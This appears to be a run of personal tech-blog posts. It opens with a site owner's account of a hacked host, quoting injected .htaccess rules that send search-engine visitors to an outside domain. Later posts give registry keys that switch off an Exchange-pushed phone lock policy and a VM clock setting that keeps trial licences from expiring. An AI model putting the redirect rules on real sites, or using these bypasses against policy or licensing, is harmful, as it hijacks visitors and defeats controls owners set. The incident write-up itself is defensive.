Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven’t renew my subscription or my domain hosting.

After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.

Sample:

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

I discovered a folder was created in my public_html, “coming10/almost”. What’s almost, the hacking is almost done ?
I found the following files inside
– .htaccess
– doing83.html
– er404.php
– everyting40php
– thanks28.html

They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well… I’m expecting somebody eye-balling the logs to determine the source of entry.

Now I still do not know how they got in, so I need to monitor my site very closely.

“AddType application/x-httpd-php5 .php”

A video can be found here on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.

The attack is not exploiting weakness of the encryption software but due to the fact that the keys have to be stored in memory.  Encrypting the key in memory don’t really help, you still need to store that key that encrypts somewhere !

When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it later.

I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.

After the first day, I got pretty pissed off by the 15mins timeout. I tried changing it but it didn’t allow me to do that. I checked around and realise it’s actually a security policy which is pushed down by my corporate Exchange Server.

Firstly the 15mins timeout is too short, you don’t look at your phone every 10mins to see if you have any new SMS, missed calls or emails. So everytime when I wanted to make a call, reply a SMS, I have to enter my pin to unlock it.

Yes, I believe we should have security controls in place, it’s always a balance of Security and Usability. I am a working in the IT Security line , but it’s too frustrating.

I searched around and I found this workaround. I very surprised the hack published in a Microsoft blog ! Here’s the screen shot of the utility and you can download it here.

Finally, I didn’t disable the phone lock feature, I left it enabled as I did in all my previous phones. I just change the timeout to a more reasonable duration.

As you can see, you can disable the phone lock or modify the timeout duration. It actually modifies the value of several registry keys.

• Enable/Disable the Exchange security policy – HKLM\Security\Policies\00001023: 0 = Enabled; 1 = Disabled
• Inactivity time
  • HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyType: 0 = No inactivity time; 1 = Activity time enable
  • HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyValue: number of minutes before timeout

Remember, the security policy is there for a reason. You won’t want your phone to be picked up by somebody with malicous intent.

Link

So when I was at Auckland for a firewall deployment, the customer was showing his Blackberry with an mapping application, Mgmaps or Mobile Gmaps. He’s using it with a built-in GPS and the best part is, the maps are stored in his memory card. Offline browsing !

It’s like an improved version of Google Maps for Mobile and the best feature which I love, offline cached mode ! I can leech the 17 zoom levels of Singapore from Google map and stored in my memory card. So now I have the street map of Singapore in my Sony Ericsson P1i.

Here’s a link to a very good tutorial to start using Mobile Gmaps.

To summarise the tutorial in my terms,

1. Go to http://www.mapcacher.com/ to mark out the areas you will like and generate a .map file
2. Use gMapMaker to “leech” the maps from Google
3. Install Mobile Gmaps into your mobile via http://wap.mgmaps.com
4. Load the “leeched” files into your memory card (warning: long transfer speeds, use a card reader if possible)
5. Launch Mobile Gmaps and configured the cache directory to the location where you copied your “leech” maps
6. Viola, Google map offline !

Of course, if you have an unlimited HSDPA plan, you can enjoy the online features which I haven’t tried

Guess what ? From the instructions, I have to contact Sony Ericsson to install the internet telephony software. If I were to update my P1 firmware, it will be a clean install.

My colleague who introduced Pfingo to me, mentioned that somebody configured Fring to use Pfingo SIP server to make SIP calls.

Remember Fring ? The multi-IM client for UIQ3 ? 

So here’s how we configure Fring.

Start Fring, Manage Communities, Select SIP and enter the information below.

User ID: your pfingoTALK number
Password: your pfingoTALK password (different from your pfingo login)
SIP Server List: others
SIP Account: sip.pfingo.com

Chat away !!

I just need a VM for testing and evaluating certain software or platforms but I don’t like re-building it when the licenses expires.

Especially when trial software always expires in like 15 or 30 days ? 7 for a particular secure os and 15 for a particular secure platform.

Here’s what I found @ http://sanbarrow.com/.

I will need to add the following lines to my xxx.vmx, so everytime the VM boots up, it resets it’s date and time to my liking.

rtc.startTime = 1089395200
tools.syncTime = false
time.synchronize.continue = false
time.synchronize.restore = false
time.synchronize.resume.disk = false
time.synchronize.resume.memory = false
time.synchronize.shrink = false

Figuring the value for rtc clock ? A small application is available for download at the same site to calculate that value from dd/mm/yyyy hh:mm:ss.

Note: For non-encrypted DVDs, meaning like personal home videos, non-commerical created DVDs, etc..

Step 1:

dvdbackup -M -i /dev/dvd -o ./outputdir/

-M tells it to make a full backup, there are other parameters to backup selective chapters.

dvdbackup will create the DVD folder structure under ./outputdir/<volume-name>

Step 2:

mkisofs -dvd-video -o dvd.iso ./outputdir/<volume-name>

Download the source here.

tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make -B install

make install will throw out some errors, so just do it with a “-B”

-B, –always-make Unconditionally make all targets.